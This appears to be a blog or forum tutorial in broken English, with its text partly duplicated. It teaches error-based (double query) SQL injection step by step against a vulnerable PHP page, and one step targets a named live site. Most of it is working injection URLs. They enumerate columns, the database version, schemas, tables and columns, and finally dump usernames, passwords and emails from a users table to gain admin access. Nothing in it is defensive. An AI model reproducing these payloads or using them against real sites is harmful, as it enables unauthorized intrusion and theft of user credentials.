Lets start injection
What you need a vul site like this
At first testing site for vul
Ok lets go inject this
So like string base lest try this
Now going to get columns
Ok find number of columns next step it using union to find vul column to inject there
So what can we do trying another method like blind lets see it
Whats now?
Are we should give up and find other site?
No,lets try other method called ERROR BASED INJECTION(DOUBLE QUERY)
In this method we use specific syntax for getting data from database
The code we use for getting version,database and aslo user like this
Now trying this syntax in our site
Notice: We dont have to use this hex
We can use the syntax without them and our code like this
It work fine but there is another problem you should know it.When we erase the hex value from code result of it like
As you see we have foregner "1" near version name and it will stay for all our results thus it maybe get confuse some one whoe new start this type of injection.
In this tutorial I write all syntax with hex value.
[color=#800]Tip:[/color]If our targer use version 4 and lower than it we can use this syntax for getting version and database name look at this
Dont worry
There is another code for this type of site you can find version and database and user of site the code is like this
Now trying this in site
As you see in the pic version 4 and we can success to find it
Now we have have version and database and move on to inject our target
For extact how many database exist in site we to use another syntax like this one
Check results for our target
Now with useing this code and replacing in limit we can find all DB
With replece in first limit we can get all requests from DB like this
For getting tables from database I use this " table_schema=0x{hex-database-name} "
First take a look our picked DB have how many tables?
By giveing a number for firs limit all table are count
I find table name " mass_users " And now we should exratct column name of this table to get gain admin access.
Only have five columns lets get it
Last step extract the value of this columns
What you need a vul site like this
Code:
www.site.com/artist.php?i=36
At first testing site for vul
Code:
www.site.com/artist.php?i=36'
we get error
Ok lets go inject this
Code:
www.site.com/artist.php?i=36 order by 10-- no error
www.site.com/artist.php?i=36 order by 20-- no error
www.site.com/artist.php?i=36 order by 50-- no error
www.site.com/artist.php?i=36 order by 100-- no error
So like string base lest try this
Code:
www.site.com/artist.php?i=36' order by 100--+
Spoiler (Click to Hide)
Now we have an error in columns
Now going to get columns
Code:
www.site.com/artist.php?i=36' order by 10--+ erro
www.site.com/artist.php?i=36' order by 8--+ error
www.site.com/artist.php?i=36' order by 6--+ error
www.site.com/artist.php?i=36' order by 5--+ no error
Ok find number of columns next step it using union to find vul column to inject there
Code:
www.site.com/artist.php?i=36' union select 1,2,3,4,5--+
So what can we do trying another method like blind lets see it
Code:
www.site.com/artist.php?i=36' and 1=1--+ its true not get error from this
www.site.com/artist.php?i=36' and 1=2--+ its false and steal no erro
Are we should give up and find other site?
No,lets try other method called ERROR BASED INJECTION(DOUBLE QUERY)
In this method we use specific syntax for getting data from database
The code we use for getting version,database and aslo user like this
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Now trying this syntax in our site
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+[code]
[spoiler][img]http://img830.imageshack.us/img830/2218/81406053.png[/img]
Notice: We dont have to use this hex
Code:
0x7e,0x27
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
It work fine but there is another problem you should know it.When we erase the hex value from code result of it like
Spoiler (Click to Hide)
As you see we have foregner "1" near version name and it will stay for all our results thus it maybe get confuse some one whoe new start this type of injection.
In this tutorial I write all syntax with hex value.
[color=#800]Tip:[/color]If our targer use version 4 and lower than it we can use this syntax for getting version and database name look at this
Code:
http://www.kusuri.co.uk/view_product.php?id=242 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
Spoiler (Click to Hide)
There is another code for this type of site you can find version and database and user of site the code is like this
Code:
or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or
Now trying this in site
Code:
http://www.kusuri.co.uk/view_product.php?id=242 or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or 1--+
Spoiler (Click to Hide)
As you see in the pic version 4 and we can success to find it
Now we have have version and database and move on to inject our target
Spoiler (Click to Hide)
For extact how many database exist in site we to use another syntax like this one
Code:
and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Check results for our target
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,count(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
Spoiler (Click to Hide)
Now with useing this code and replacing in limit we can find all DB
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,concat(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
With replece in first limit we can get all requests from DB like this
Code:
limit 0,1 for first exicting things
limit 1,1 for two exicting things
.
.
.
limit N,1 for N exicting things
For getting tables from database I use this " table_schema=0x{hex-database-name} "
First take a look our picked DB have how many tables?
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name}
0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1--+
Spoiler (Click to Hide)
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name}
0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1--+
Spoiler (Click to Hide)
By giveing a number for firs limit all table are count
I find table name " mass_users " And now we should exratct column name of this table to get gain admin access.
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273
0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1--+
Spoiler (Click to Hide)
Only have five columns lets get it
Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273
0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1--+
Spoiler (Click to Hide)
[img]img209.imageshack.us/img209/949/userb.png[/img]
All column are here
All column are here
Code:
id,username,password,firstname,email
Last step extract the value of this columns
Code:
http://www.site.com/artist.php?i=36' and+(select 1 from(select+count(*),concat((select+concat(username,0x3a,password,0x3a,email) from mass_users+limit+0,1),floor(rand(0)*2))x
from information_schema.tables+group by x)a) and 1=1--+
0 comments:
Post a Comment